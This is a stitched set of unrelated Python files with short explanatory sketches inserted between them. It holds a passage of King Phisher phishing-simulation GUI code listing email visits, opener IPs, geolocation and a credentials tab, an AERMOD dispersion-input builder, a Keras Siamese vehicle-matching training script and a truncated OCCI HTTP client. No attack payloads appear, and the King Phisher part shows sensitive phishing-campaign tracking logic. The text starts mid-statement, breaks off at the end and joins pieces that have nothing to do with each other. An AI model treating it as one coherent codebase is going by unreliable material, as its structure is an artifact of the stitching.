else: self.last_load_time = time.time() class CampaignViewVisitsTab(CampaignViewGenericTableTab): """Display campaign information regarding incoming visitors.""" remote_table_name = 'visits' label_text = 'Visits' view_columns = ( 'Email Address', 'IP Address', 'Visit Count', 'Visitor User Agent', 'Visitor Location', 'First Visit', 'Last Visit' ) def __init__(self, *args, **kwargs): super(CampaignViewVisitsTab, self).__init__(*args, **kwargs) self._ips_for_georesolution = {} def format_row_data(self, visit): msg_details = self.rpc.remote_table_row('messages', visit.message_id, cache=True) if not msg_details: return None visitor_ip = ipaddress.ip_address(visit.visitor_ip) geo_location = UNKNOWN_LOCATION_STRING if visitor_ip.is_loopback: geo_location = 'N/A (Loopback)' elif visitor_ip.is_private: geo_location = 'N/A (Private)' elif isinstance(visitor_ip, ipaddress.IPv6Address): geo_location = 'N/A (IPv6 Address)' else: if not visitor_ip in self._ips_for_georesolution: self._ips_for_georesolution[visitor_ip] = visit.first_visit elif self._ips_for_georesolution[visitor_ip] > visit.first_visit: 
self._ips_for_georesolution[visitor_ip] = visit.first_visit row = ( msg_details.target_email, str(visitor_ip), visit.visit_count, visit.visitor_details, geo_location, visit.first_visit, visit.last_visit ) return row def loader_thread_routine(self, store): self._ips_for_georesolution = {} super(CampaignViewVisitsTab, self).loader_thread_routine(store) ips_for_geores = [ip for (ip, _) in sorted(self._ips_for_georesolution.items(), key=lambda x: x[1])] locations = {} for ip_addresses in iterutils.chunked(ips_for_geores, 50): locations.update(self.rpc.geoip_lookup_multi(ip_addresses)) for row in store: if row[2] in locations: row[5] = str(locations[row[2]]) class CampaignViewMessagesTab(CampaignViewGenericTableTab): """Display campaign information regarding sent messages.""" remote_table_name = 'messages' label_text = 'Messages' view_columns = ( 'Email Address', 'Sent', 'Trained', 'Department', 'Opened', 'Opener IP Address', 'Opener User Agent' ) def format_row_data(self, message): department = message.company_department if department: department = department.name row = ( message.target_email, message.sent, ('Yes' if message.trained else ''), department, message.opened, message.opener_ip, message.opener_user_agent ) return row class CampaignViewTab(object): """ The King Phisher client top-level 'View Campaign' tab. This object manages the sub-tabs which display all the information regarding the current campaign. """ def __init__(self, parent, application): """ :param parent: The parent window for this object. :type parent: :py:class:`Gtk.Window` :param application: The main client application instance. :type application: :py:class:`Gtk.Application` """ self.parent = parent self.application = application self.config = application.config self.logger = logging.getLogger('KingPhisher.Client.' 
+ self.__class__.__name__) self.box = Gtk.Box() self.box.set_property('orientation', Gtk.Orientation.VERTICAL) self.box.show() self.label = Gtk.Label(label='View Campaign') """The :py:class:`Gtk.Label` representing this tabs name.""" self.notebook = Gtk.Notebook() """ The :py:class:`Gtk.Notebook` for holding sub-tabs.""" self.notebook.connect('switch-page', self.signal_notebook_switch_page) self.notebook.set_scrollable(True) self.box.pack_start(self.notebook, True, True, 0) self.tabs = utilities.FreezableDict() """A dict object holding the sub tabs managed by this object.""" current_page = self.notebook.get_current_page() self.last_page_id = current_page if graphs.has_matplotlib: self.logger.info('matplotlib is installed, dashboard will be available') dashboard_tab = CampaignViewDashboardTab(application) self.tabs['dashboard'] = dashboard_tab self.notebook.append_page(dashboard_tab.box, dashboard_tab.label) else: self.logger.warning('matplotlib is not installed, dashboard will not be available') messages_tab = CampaignViewMessagesTab(application) self.tabs['messages'] = messages_tab self.notebook.append_page(messages_tab.box, messages_tab.label) visits_tab = CampaignViewVisitsTab(application) self.tabs['visits'] = visits_tab self.notebook.append_page(visits_tab.box, visits_tab.label) credentials_tab = CampaignViewCredentialsTab(application) self.tabs['credentials'] = credentials_tab self.notebook.append_page(credentials_tab.box, credentials_tab.label) if self.config.get('gui.show_deaddrop', False): deaddrop_connections_tab = CampaignViewDeaddropTab(application) self.tabs['deaddrop_connections'] = deaddrop_connections_tab self.notebook.append_page(deaddrop_connections_tab.box, deaddrop_connections_tab.label) self.tabs.freeze() for tab in self.tabs.values(): tab.box.show() self.notebook.show() def signal_notebook_switch_page(self, notebook, current_page, index): if not hasattr(self.parent, 'rpc'): return #previous_page = notebook.get_nth_page(self.last_page_id) self.last_page_id = index for tab in self.tabs.values(): if current_page != tab.box: continue if hasattr(tab, 'load_campaign_information'): tab.load_campaign_information(force=False)
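# Stripped-down sketch of the loader-thread pattern the campaign tabs rely on:
# a background worker fills a store row by row and honours a stop Event so the
# UI can interrupt it early (as _sync_loader_thread does). GTK, the RPC layer
# and the ListStore are replaced by stand-ins (fetch_rows, a plain list), so
# this only illustrates the threading shape, not king_phisher API usage.
import threading
import time


def fetch_rows(n=10):
    # Stand-in for rpc.remote_table(...): yields rows slowly.
    for i in range(n):
        time.sleep(0.1)
        yield {'id': i, 'email': 'user{}@example.com'.format(i)}


def loader_routine(store, stop_event):
    for row in fetch_rows():
        if stop_event.is_set():
            break
        store.append([str(row['id']), row['email']])


store, stop_event = [], threading.Event()
loader = threading.Thread(target=loader_routine, args=(store, stop_event), daemon=True)
loader.start()

time.sleep(0.35)   # let a few rows land...
stop_event.set()   # ...then request an early stop
loader.join()
print(len(store), 'rows loaded before the stop was honoured')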
aermodInput.py
#!/usr/bin/env python3 import pandas as pd import geopandas as gpd import networkx as nx from shapely.geometry import Point,LineString from shapely.wkt import loads from shapely.strtree import STRtree import math import argparse import multiprocessing as mp from itertools import chain import hashlib import os from aermodConst import * home = os.path.dirname(__file__) aermodTemplate = open(os.path.join(home,'AERMOD_input_template.txt')).read() # functions for parallel receptor checking output = mp.SimpleQueue() def checkReceptorGroup(tree,data): indices = [] for idx,row in data.iterrows(): if tree.nearest(row.location).contains(row.location): print('Dropping',row.receptorID) indices.append(idx) output.put(indices) def checkAllReceptors(tree,receptors,numGroups = None): numReceptors = receptors.index.size if numGroups is None: numGroups = mp.cpu_count() groupSize = 1 + int(numReceptors/numGroups) args = [] for start in range(0,numReceptors,groupSize): if start >= numReceptors: break stop = start + groupSize if stop > numReceptors: stop = numReceptors args.append((tree,receptors.iloc[range(start,stop)])) procs = [mp.Process(target = checkReceptorGroup,args = arg) for arg in args] for p in procs: p.start() for p in procs: if p.is_alive(): print('Joining',p.name) p.join(timeout = 10) indices = [output.get() for p in procs] return list(chain(*indices)) class AermodScenario(object): def __init__(self,epsg,laneWidth): self.pollutantID = 110 self.pollutant = 'PM25 H1H' self.epsg = 3665 if epsg is None else epsg self.laneWidth = 3.6576 if laneWidth is None else laneWidth*feet2meters # init dataframes self.lineSources = pd.DataFrame( columns = ['sourceID','x1','y1','x2','y2','flux','width','geometry','buffers'] ) def getLinkGeometries(self,linksPath): # read the links self.scenarioGDF = gpd.read_file(linksPath) # project self.scenarioGDF = self.scenarioGDF.to_crs(epsg = self.epsg) # define the study area self.studyArea = self.scenarioGDF.unary_union.convex_hull.buffer(receptorSpacing) def constructNetwork(self): # add the links to a DiGraph() object for easier retrieval self.network = nx.DiGraph() for idx,row in self.scenarioGDF.iterrows(): self.network.add_edge( row.A_NODE,row.B_NODE, geometry = row.geometry, width = row['#LANES']*self.laneWidth ) def mergeEmissionRate(self,emissionsPath): # read the total_emissions.csv from S3 and add the g/(s*m^2) # emissionFlux for each link emissions = pd.read_csv(emissionsPath) # filter on and pollutant emissions = emissions.query(f'pollutantID == {self.pollutantID}') # aggregate to link emissions = emissions.groupby('linkID').emquant.sum().reset_index() # iterate and add the emission flux to every link for idx,row in emissions.iterrows(): a,b = map(int,row['linkID'].split('-')) link = self.network[a][b] area = link['geometry'].length*link['width'] link['flux'] = row['emquant']/(area*secondsInDay) def makeSources(self): # for every link that has non-zero emissions, decompose it # into straight line segments, assign these segments new IDs # and save them in a dataframe numLinks = len(self.network.edges) rows = [] for a,b,link in self.network.edges(data = True): flux = link.get('flux') if not flux: continue points = [Point(p) for p in link['geometry'].coords] for index in range(len(points) - 1): sourceID = f'{a}_{b}_{index}' start = points[index] end = points[index + 1] # discard very short (< 1 meter) segments if start.distance(end) < 1: continue geom = LineString((start,end)) # print('Adding source',sourceID) rows.append({ 'sourceID':sourceID, 
'x1':start.x,'y1':start.y, 'x2':end.x,'y2':end.y, 'flux':flux, 'width':link['width'], 'geometry':geom, 'buffers':geom.buffer(0.5*link['width']) }) # make the geopandas dataframe with all line source buffers self.lineSources = gpd.GeoDataFrame( rows,geometry = 'geometry',crs = f'epsg:{self.epsg}' ) # make the R-tree of all buffers self.tree = STRtree(self.lineSources.buffers) # add the UID column that is the 12 character hash of the # sourceID self.lineSources['UID'] = self.lineSources.sourceID.apply( lambda ID: hashlib.md5(ID.encode()).hexdigest()[:12] ) print('Finished making sources') def addReceptorLayers(self,source): # link length and number of receptors along the link length = source.geometry.length numReceptors = int(length/receptorSpacing) + 1 # starting position of receptors along the link startPos = 0.5*(length - receptorSpacing*(numReceptors - 1)) receptors = [] for layerID,scale in enumerate(receptorLayerScales): # receptor distance from link centerline dist = scale + 0.5*source.width print('Adding',numReceptors,'for layer',layerID, 'source',source.sourceID) # the link shifted normally to itself on either side offsets = [source.geometry.parallel_offset(dist), source.geometry.parallel_offset(-dist)] for receptorIdx in range(numReceptors): # generate equidistant points along the parallel offsets for offsetIdx,offset in enumerate(offsets): location = offset.interpolate( startPos + receptorIdx*receptorSpacing ) receptorID = '{}_{}_{}_{}'.format( source.sourceID, layerID, receptorIdx, offsetIdx ) receptors.append({ 'receptorID':receptorID, 'location':location }) return receptors def makeGridReceptors(self): # add gridded receptors with xy spacing of receptorSpacing xmin,ymin,xmax,ymax = self.studyArea.bounds numX = int((xmax - xmin)/receptorSpacing) + 1 numY = int((ymax - ymin)/receptorSpacing) + 1 xoffset = 0.5*(xmax - xmin - receptorSpacing*(numX - 1)) yoffset = 0.5*(ymax - ymin - receptorSpacing*(numY - 1)) receptors = [] for xIdx in range(numX): x = xmin + xoffset + xIdx*receptorSpacing for yIdx in range(numY): y = ymin + yoffset + yIdx*receptorSpacing location = Point((x,y)) # skip if the receptor is outside the study area if not self.studyArea.contains(location): continue # add otherwise receptorID = f'grid_{xIdx}_{yIdx}' print('adding grid receptor',receptorID) receptors.append({ 'receptorID':receptorID, 'location':location }) self.receptors = self.receptors.append( receptors,ignore_index = True ) def makeLinkReceptors(self): numSources = len(self.lineSources) receptors = [] for idx,(sourceID,source) in enumerate(self.lineSources.iterrows()): print('Processing source',idx,'out of',numSources) receptors.extend(self.addReceptorLayers(source)) self.receptors = pd.DataFrame( receptors, columns = ['receptorID','geometry'] ) def makeSourceReceptors(self): # iterate over the links that have an emission rate; compute # the number of receptor layers using the log scale of the # link areal emissions rate. The links with the maxFlux # should have 3 layers. 
The distances of the receptor layers # from the roadway are defined in aermodConst.py maxLogFlux = math.log(self.lineSources.flux.max()) minLogFlux = math.log(self.lineSources.flux.min()) logFluxDiff = maxLogFlux - minLogFlux numSources = len(self.lineSources) receptors = [] for idx,(sourceID,source) in enumerate(self.lineSources.iterrows()): print('Processing source',idx + 1,'out of',numSources) logFlux = math.log(source.flux) numReceptorLayers = 1 + int( len(receptorLayerScales)*(logFlux - minLogFlux)/logFluxDiff ) if numReceptorLayers > len(receptorLayerScales): numReceptorLayers = len(receptorLayerScales) # print('Processing source',idx+1,'out of',numSources, # numReceptorLayers,'layers') receptors.extend(self.addReceptorLayers(source)) self.receptors = pd.DataFrame( receptors,columns = ['receptorID','geometry'] ) def dropReceptorsInSources(self): idsToDrop = set(checkAllReceptors(self.tree,self.receptors)) # remove the receptors that fall into sources self.receptors = self.receptors[ ~self.receptors.receptorID.isin(idsToDrop) ] def saveReceptors(self): # make a GeoDataFrame receptorGDF = gpd.GeoDataFrame( self.receptors,geometry = 'geometry' ) # set crs receptorGDF.crs = f'epsg:{self.epsg}' # drop duplicate receptors receptorGDF = receptorGDF.loc[ receptorGDF.geometry.apply( lambda geom: geom.wkb ).drop_duplicates().index ] # save it receptorGDF.to_file( 'receptors.geojson',driver='GeoJSON',index = False ) def saveSources(self): # transform the 'buffers column to wkb' self.lineSources['buffers'] = [ g.wkt for g in self.lineSources.buffers ] # save self.lineSources.to_file( 'sources.geojson',driver='GeoJSON',index = False ) def readSources(self): try: self.lineSources = gpd.read_file('sources.geojson') self.lineSources = self.lineSources.to_crs( epsg = self.epsg ) # load the buffers from wkb self.lineSources['buffers'] = [ loads(poly) for poly in self.lineSources.buffers ] # make the R-tree of the buffers self.tree = STRtree(self.lineSources.buffers) # make the study area self.studyArea = self.lineSources.unary_union.convex_hull.buffer( receptorSpacing ) print('Read sources.geojson') return True except: return False def readReceptors(self): try: self.receptors = gpd.read_file('receptors.geojson') self.receptors = self.receptors.to_crs( epsg = self.epsg ) print('Read receptors.geojson') return True except: return False def constructSourceLocation(self,subset): return '\n'.join( 'SO LOCATION ' + subset.UID + ' LINE ' + subset.x1.astype(str) + ' ' + subset.y1.astype(str) + ' ' + subset.x2.astype(str) + ' ' + subset.y2.astype(str) ) def constructSourceParam(self,subset): return '\n'.join( 'SO SRCPARAM ' + subset.UID + ' ' + subset.flux.astype(str) + f' {sourceHeight} ' + subset.width.astype(str) ) def constructReceptorCoords(self): return '\n'.join( 'RE DISCCART' + self.receptors.geometry.apply( lambda p: f' {round(p.x,5)} {round(p.y,5)}' ) + ' ' + str(receptorHeight) ) def processAERMETfiles(self,aermetDir): self.aermetDir = aermetDir self.stanumSurf = open(os.path.join( aermetDir,'bestSurfaceStation.txt' )).read() self.stanumAir = open(os.path.join( aermetDir,'bestUpperStation.txt' )).read() self.profbase = float(open(os.path.join( aermetDir,'bestSurfElev.txt' )).read()) upperData = pd.read_csv( os.path.join(aermetDir,'AERMETUPPER.PFL'), sep = '\s+',header = None ) self.year = set(upperData[0]).pop() self.month = set(upperData[1]).pop() def constructAermodInputs(self,title,groupSize,population,day): self.population = population self.day = day self.title = title # bundle groupSize sources 
together # write the receptors text to a file to be later imported into # the .inp file at run time with open('receptors.txt','w') as f: f.write(self.constructReceptorCoords()) numSources = len(self.lineSources) numGroups = 1 + int(numSources/groupSize) for groupIdx in range(numGroups): start = groupIdx*groupSize end = start + groupSize self.assembleAndWriteInput(start,end) def assembleAndWriteInput(self,start,end): prefix = f'{self.title}_{start}-{end}' subset = self.lineSources.iloc[start:end] aermodInput = aermodTemplate.format( title = prefix, population = self.population, pollutant = self.pollutant, sourceLocation = self.constructSourceLocation(subset), sourceParam = self.constructSourceParam(subset), urbanSource = '\n'.join('SO URBANSRC ' + subset['UID']), receptorCoords = f' INCLUDED receptors.txt', stanumSurf = self.stanumSurf, stanumAir = self.stanumAir, profbase = self.profbase, pathToSurf = os.path.join(self.aermetDir,'AERMETSURFACE.SFC'), pathToUpper = os.path.join(self.aermetDir,'AERMETUPPER.PFL'), year = '20' + str(self.year), month = self.month, day = self.day, postfile = f'{prefix}.out' ) with open(f'{prefix}.inp','w') as f: f.write(aermodInput)
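# Pared-down sketch of the fan-out used by checkAllReceptors above: split a table
# into roughly equal chunks, run one worker process per chunk, and collect one
# result list per worker through a SimpleQueue. The predicate is a trivial
# stand-in for the STRtree containment test, so only the multiprocessing shape
# is meant to carry over.
import multiprocessing as mp
from itertools import chain


def check_chunk(rows, out):
    # Stand-in test: flag even values, where the real code flags receptors whose
    # point falls inside a source buffer.
    out.put([r for r in rows if r % 2 == 0])


def check_all(rows, num_groups=None):
    out = mp.SimpleQueue()
    num_groups = num_groups or mp.cpu_count()
    size = 1 + len(rows) // num_groups
    chunks = [rows[i:i + size] for i in range(0, len(rows), size)]
    procs = [mp.Process(target=check_chunk, args=(chunk, out)) for chunk in chunks]
    for p in procs:
        p.start()
    results = [out.get() for _ in procs]   # one list per worker
    for p in procs:
        p.join()
    return list(chain(*results))


if __name__ == '__main__':
    print(sorted(check_all(list(range(20)), num_groups=4)))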
siameseModelIterator-15.py
# coding: utf-8 # In[1]: import datetime import glob import hashlib import multiprocessing as mp import os import queue import random import threading from functools import partial import keras.backend.tensorflow_backend as KTF #import matplotlib.pyplot as plt import numpy as np import tensorflow as tf from keras import backend as K from keras.applications.resnet50 import ResNet50, preprocess_input from keras.callbacks import (EarlyStopping, ModelCheckpoint, ReduceLROnPlateau, TensorBoard) from keras.layers import Dense, GlobalAveragePooling2D, Input, Lambda, merge from keras.layers.normalization import BatchNormalization from keras.models import Model, load_model, model_from_json from keras.optimizers import RMSprop from keras.preprocessing import image from keras.utils.np_utils import to_categorical import pelops.utils as utils from pelops.analysis import analysis from pelops.analysis.camerautil import get_match_id, make_good_bad from pelops.datasets.featuredataset import FeatureDataset from pelops.datasets.veri import VeriDataset from pelops.experiment_api.experiment import ExperimentGenerator from pelops.utils import train_test_key_filter # In[2]: # In[3]: def save_model_workaround(model, model_output_file, weights_output_file): print('saving model to {}'.format(model_output_file)) print('saving weights to {}'.format(weights_output_file)) # serialize model to JSON model_json = model.to_json() with open(model_output_file, 'w') as json_file: json_file.write(model_json) # serialize weights to HDF5 model.save_weights(weights_output_file) def load_model_workaround(model_output_file, weights_output_file): # load json and create model json_file = open(model_output_file, 'r') loaded_model_json = json_file.read() json_file.close() loaded_model = model_from_json(loaded_model_json) # load weights into new model loaded_model.load_weights(weights_output_file) return loaded_model # In[4]: def makework(workitems, chips, cam_id=None): left = chips[0] right = chips[1] same_vehicle = left.car_id == right.car_id same_type = left.misc['vehicle_type'] == right.misc['vehicle_type'] same_color = left.misc['color'] == right.misc['color'] #same_angle = cam_id(left.cam_id) == cam_id(right.cam_id) features = [same_vehicle, same_type, same_color] workitems.append((left.filepath, right.filepath, features)) workitems.append((right.filepath, left.filepath, features)) def make_examples(gen, examples): workitems = [] for _ in range(examples): cameras = gen.generate() match_id = get_match_id(cameras) goods, bads = make_good_bad(cameras, match_id) makework(workitems, goods) makework(workitems, bads) print('made', len(workitems)) return workitems # In[5]: # get a GPU session and reserve memory def get_session(gpu_fraction=0.3): '''Assume that you have 6GB of GPU memory and want to allocate ~2GB''' num_threads = os.environ.get('OMP_NUM_THREADS') gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=gpu_fraction) if num_threads: return tf.Session(config=tf.ConfigProto( gpu_options=gpu_options, intra_op_parallelism_threads=num_threads)) else: return tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)) def rgb2bgr(x): """ given an array representation of an RGB image, change the image into an BGR representtaion of the image """ return(bgr2rgb(x)) def bgr2rgb(x): """ given an array representation of an BGR image, change the image into an RGB representtaion of the image """ y = np.zeros(x.shape) B = x[:, :, 0] G = x[:, :, 1] R = x[:, :, 2] y[:, :, 0] = R y[:, :, 1] = G y[:, :, 2] = B return y # load an image from 
disk # NOTE: input assumed to be RGB # NOTE: output is to be BGR for resnet use. def load_image(img_path, e_dims=False, image_flip=0.5, image_shift=0.20, image_rotate_degrees=15, image_zoom=0.15, output_BGR=True): """ WARNING this funciton should only manipulation images meant for resnet50 consumption. To make it applicable for other environments remove preprocess_input. Do some image manipulation image input assumed to be in RGB format output format default is GBR unless output_BGR is set to False e_dims = e_dims false will output (x,y,3) sized images e_domes true will output (1,x,y,3) sized images image_flip = probability that image will be flipped rt to left image_shift = percent of image to randomly shift up/down & right/left image_rotate_degrees = rotate image randomly between [-image_rotate_degrees image_rotate_degrees] image_zoom = randomly zoom image [1-image_zoom 1+image_zoom] output_BGR = True -> image output will be in BGR formate RGB otherwise """ img = image.load_img(img_path, target_size=(224, 224)) my_img = image.img_to_array(img) if image_flip is not None: if image_flip > 1 or image_flip < -1: raise ValueError('|image_flip:{0}| > 1'.format(image_flip)) image_flip = abs(image_flip) if random.random() > image_flip: my_img = image.flip_axis(my_img, axis=1) if image_rotate_degrees is not None: image_rotate_degrees = int(image_rotate_degrees) if image_rotate_degrees > 360: image_rotate_degrees = image_rotate_degrees % 360 my_img = image.random_rotation(my_img, image_rotate_degrees, row_index=0, col_index=1, channel_index=2) if image_shift is not None: if image_shift > 1 or image_shift < -1: raise ValueError('|image_shift:{0}| > 1'.format(image_shift)) image_shift = abs(image_shift) my_img = image.random_shift(my_img, image_shift, image_shift, row_index=0, col_index=1, channel_index=2) if image_zoom is not None: if image_zoom > 1 or image_zoom < -1: raise ValueError('|image_zoom:{0}| > 1'.format(image_zoom)) image_zoom = abs(image_zoom) low = 1 - image_zoom high = 1 + image_zoom rng = [low, high] my_img = image.random_zoom(my_img, rng, row_index=0, col_index=1, channel_index=2) if not output_BGR: my_img = bgr2rgb(my_img) my_img = np.expand_dims(my_img, axis=0) my_img = preprocess_input(my_img) if not e_dims: my_img = my_img.squeeze() return my_img # In[6]: def plot_run_no(history, name1, name2, rnd=None): """ Take the output of a model. 
""" v = np.array(history[name1]) vc = np.array(history[name2]) if rnd is not None: vr = np.zeros(vc.shape) vr.fill(rnd) b = np.array([v, vc, vr]) else: b = np.array([v, vc]) c = b.transpose() ax = plt.subplot(111) ax.grid(True) ax.plot(c) if rnd is not None: ax.legend((name1, name2, 'random'), bbox_to_anchor=(1, -0.05), fancybox=True, shadow=True, ncol=5) else: ax.legend((name1, name2), bbox_to_anchor=(1, -0.05), fancybox=True, shadow=True, ncol=5) plt.show() # In[7]: def image_class_generator(tasking, batch_size=32, augment=False): """ Offload the augmentation of images, create images in batch_size chunks augment=False -> return image augment=True -> return augmented image """ while True: lefts = [] rights = [] ys = [] for task in random.sample(tasking, batch_size): left_file = task[0] right_file = task[1] classes = task[2] y = np.zeros(len(classes)) for index, c in enumerate(classes): y[index] = 1 if c else 0 l_img = None r_img = None if augment: l_img = load_image(left_file) r_img = load_image(right_file) else: l_img = load_image(left_file, False, None, None, None, None) r_img = load_image(right_file, False, None, None, None, None) lefts.append(l_img) rights.append(r_img) ys.append(y) yield ([np.array(lefts), np.array(rights)], np.array(ys)) def buffered_gen_mp(source_gen, buffer_size=2, num_processes=4): """ Generator that runs a slow source generator in a separate process. buffer_size: the maximal number of items to pre-generate (length of the buffer) """ if buffer_size < 2: raise RuntimeError("Minimal buffer size is 2!") buffer = mp.Queue(maxsize=buffer_size - 1) # the effective buffer size is one less, because the generation process # will generate one extra element and block until there is room in the # buffer. def _buffered_generation_process(source_gen, buffer): for data in source_gen: buffer.put(data, block=True) buffer.put(None) # sentinel: signal the end of the iterator buffer.close() # unfortunately this does not suffice as a signal: if buffer.get() # was called and subsequently the buffer is closed, it will block # forever. for _ in range(num_processes): process = mp.Process( target=_buffered_generation_process, args=(source_gen, buffer)) process.start() for data in iter(buffer.get, None): yield data # In[8]: def freeze(model): """ Make model untrainable """ for layer in model.layers: layer.trainable = False model.trainable = False # In[9]: def free_model_layers(model): """ Make the model trainable """ for layer in model.layers: try: if layer.name == 'resnet50': print('found resnet') for rn_layer in layer.layers: try: if not rn_layer.trainable: rn_layer.trainable = True except: if 'merge' not in rn_layer.name: print('rn layer not trainable', rn_layer.name) if not layer.trainable: layer.trainable = True except: if 'merge' not in layer.name.lower(): print('layer not trainable:', layer.name) # In[10]: def make_siamese_model_concat(num_training_classes=3): """ Siamese network created via concatenating resnet50 outputs @TODO see if less layers can now be used because of not using binary_crossentropy.. 
""" base_model = ResNet50(weights='imagenet', include_top=False) freeze(base_model) input_left = Input(shape=(224, 224, 3)) input_right = Input(shape=(224, 224, 3)) processed_left = base_model(input_left) processed_right = base_model(input_right) # join by slapping vectors together siamese_join = merge([processed_left, processed_right], mode='concat') my_layer = GlobalAveragePooling2D()(siamese_join) my_layer = Dense(4096, activation='relu')(my_layer) my_layer = BatchNormalization()(my_layer) my_layer = Dense(2048, activation='relu')(my_layer) my_layer = BatchNormalization()(my_layer) my_layer = Dense(2048, activation='relu')(my_layer) predictions = Dense(num_training_classes, activation='sigmoid')(my_layer) model = Model([input_left, input_right], output=predictions) return model # In[11]: def s_distance(vects): """ return the abs difference between vectors """ x, y = vects s = K.abs(x - y) #s = K.sqrt(K.square(x - y)) return (s) # return K.squeeze(x,1) - K.squeeze(y,1) def s_shape(shapes): """ return the sape of the vector being used """ shape = list(shapes) outshape = (shape[0]) return tuple(outshape) def make_siamese_model_subtract(num_training_classes=2): """ Siamese network created via subtracting resnet50 outputs """ base_model = ResNet50(weights='imagenet', include_top=False) for layer in base_model.layers: layer.trainable = False base_model.trainable = False input_left = Input(shape=(224, 224, 3)) input_right = Input(shape=(224, 224, 3)) processed_left = base_model(input_left) processed_right = base_model(input_right) # use a distance measure for making the join siamese_join = Lambda(s_distance, output_shape=s_shape)([processed_left, processed_right]) my_layer = GlobalAveragePooling2D()(siamese_join) my_layer = Dense(1024, activation='relu')(my_layer) my_layer = BatchNormalization()(my_layer) predictions = Dense(num_training_classes, activation='sigmoid')(my_layer) model = Model([input_left, input_right], output=predictions) return model # In[12]: def make_callbacks(model_checkpoint_format_string, tensor_board_log_dir): """ programatically make the callbacks to be used for training """ callbacks = [] if model_checkpoint_format_string is not None: callbacks.append(ModelCheckpoint(model_checkpoint_format_string, monitor='loss', verbose=1, save_best_only=True, save_weights_only=False, mode='min', period=1)) if tensor_board_log_dir is not None: callbacks.append(TensorBoard(log_dir=tensor_board_log_dir, histogram_freq=0, write_graph=True, write_images=False)) callbacks.append(ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=4, verbose=1, mode='min', epsilon=0.001, cooldown=2, min_lr=0)) callbacks.append(EarlyStopping(monitor='val_acc', min_delta=0.003, patience=6, verbose=1, mode='max')) return callbacks # In[13]: def checkLabels(x): """ Make a warm fuzzy about the classes being balanced """ s_id = 0.0 s_type = 0.0 s_color = 0.0 total = len(x) for v in x: if v[2][0]: s_id += 1 if v[2][1]: s_type += 1 if v[2][2]: s_color += 1 print('P(s_id==1):{0} P(s_type==1):{1} P(s_color==1):{2}'.format( s_id / total, s_type / total, s_color / total)) return s_id / total, s_type / total, s_color / total # In[14]: #--------------------------------------- # In[15]: # set some constants ITEMSPERCAMERA = 2 YRANDOM = 13024 CAMERAS = 2 DROPPED = 0 EXPERIMENTS = int(40000 / 4) batch_size = 16 tbld = '/local_data/dgrossman/tensorboard_logs' mcfs = '/local_data/dgrossman/tempdir/veri-siamese.{epoch:02d}-{val_loss:.2f}-{val_acc:.2f}.hdf5' # In[16]: veri_validate = VeriDataset( 
'/local_data/dgrossman/VeRi', set_type=utils.SetType.TEST.value) veri_train = VeriDataset('/local_data/dgrossman/VeRi', set_type=utils.SetType.TRAIN.value) expGen_validate = ExperimentGenerator(veri_train, CAMERAS, ITEMSPERCAMERA, DROPPED, YRANDOM, key_filter=partial(train_test_key_filter, split="test")) expGen_train = ExperimentGenerator(veri_train, CAMERAS, ITEMSPERCAMERA, DROPPED, YRANDOM, key_filter=partial(train_test_key_filter, split="train")) # In[17]: training_examples = make_examples(expGen_train, EXPERIMENTS) validaiton_examples = make_examples(expGen_validate, EXPERIMENTS) # GROSSMAN # In[18]: checkLabels(training_examples) # In[19]: checkLabels(validaiton_examples) # In[19]: # GROSSMAN change augment to True when running for real. train_buffered_generator_mp = buffered_gen_mp(image_class_generator(training_examples, batch_size, augment=True), buffer_size=20, num_processes=5) val_buffered_generator_mp = buffered_gen_mp(image_class_generator(validaiton_examples, batch_size, augment=False), buffer_size=20, num_processes=5) # In[20]: callbacks = make_callbacks(mcfs, tbld) # In[21]: KTF.set_session(get_session(.90)) # In[25]: #model = make_siamese_model_concat(3) model = make_siamese_model_subtract(3) model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy']) # In[26]: fixed_history = model.fit_generator(train_buffered_generator_mp, samples_per_epoch=10240, nb_epoch=20, callbacks=None, nb_val_samples=10240, validation_data=val_buffered_generator_mp, verbose=2) fixed_history.history free_model_layers(model) model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy']) free_history = model.fit_generator(train_buffered_generator_mp, samples_per_epoch=10240, nb_epoch=50, callbacks=callbacks, nb_val_samples=10240, validation_data=val_buffered_generator_mp, verbose=2) save_model_workaround(model, '/local_data/dgrossman/model_save_dir/VeRi-siamese-weekend-6.model.json', '/local_data/dgrossman/model_save_dir/VeRi-siamese-weekend-6.weights.hdf5')
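# Self-contained sketch of the buffered_gen_mp idea used above: a producer
# process pushes items from a slow generator through a bounded
# multiprocessing.Queue, terminated by a None sentinel, so the consumer (the
# Keras fit_generator loop in the original script) rarely waits on data
# generation. A single producer and dummy batches keep the sketch short.
import multiprocessing as mp
import time


def slow_batches(n=5):
    for i in range(n):
        time.sleep(0.2)      # stand-in for image loading/augmentation
        yield {'batch': i}


def _producer(buffer):
    for item in slow_batches():
        buffer.put(item, block=True)
    buffer.put(None)         # sentinel: no more batches


def buffered_gen(buffer_size=2):
    buffer = mp.Queue(maxsize=buffer_size - 1)
    mp.Process(target=_producer, args=(buffer,), daemon=True).start()
    return iter(buffer.get, None)


if __name__ == '__main__':
    for batch in buffered_gen():
        print('consumed', batch)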
clientPyocni.py
# Copyright 2013 Institut Mines-Telecom - Telecom SudParis # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Created on Jun 4, 2013 @author: Marouen Mechtri @contact: marouen.mechtri@it-sudparis.eu @organization: Institut Mines-Telecom - Telecom SudParis @license: Apache License, Version 2.0 """ import pycurl import StringIO import urllib from multiprocessing import Process, Value import simplejson as json import ast class OCCIinterfaceClient: def __init__(self, host, port, category, entity): self.host = host self.port = port self.category = category self.entity = entity def postall_process(self): resource = {} resource['resources']=[self.entity] c = pycurl.Curl() c.setopt(c.URL, 'http://' + self.host + ':' + self.port + '/' + self.category + '/') c.setopt(c.HTTPHEADER, ['Accept:text/plain', 'Content-Type: application/occi+json']) c.setopt(pycurl.POSTFIELDS, json.dumps(resource)) c.setopt(c.CUSTOMREQUEST, 'POST') c.perform() def update_process(self): resource = {} resource['resources']=[self.entity] c = pycurl.Curl() c.setopt(c.URL, 'http://' + self.host + ':' + self.port + '/' + self.category + '/' + self.entity['id']) 